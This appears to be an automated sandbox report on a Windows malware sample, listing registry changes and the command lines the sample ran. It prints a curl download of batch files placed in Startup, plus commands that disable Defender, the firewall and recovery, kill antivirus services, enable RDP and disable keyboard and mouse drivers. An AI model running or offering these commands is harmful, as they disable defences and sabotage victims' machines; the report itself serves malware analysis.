| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe
"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\system32\curl.exe
curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\curl.exe
curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net stop "SDRSVC"
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC"
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\system32\net.exe
net stop "security center"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\system32\net.exe
net stop "wuauserv"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\net.exe
net stop sharedaccess
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net stop "SDRSVC"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\system32\net.exe
net stop "security center"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\net.exe
net stop "wuauserv"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\net.exe
net stop sharedaccess
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\taskkill.exe
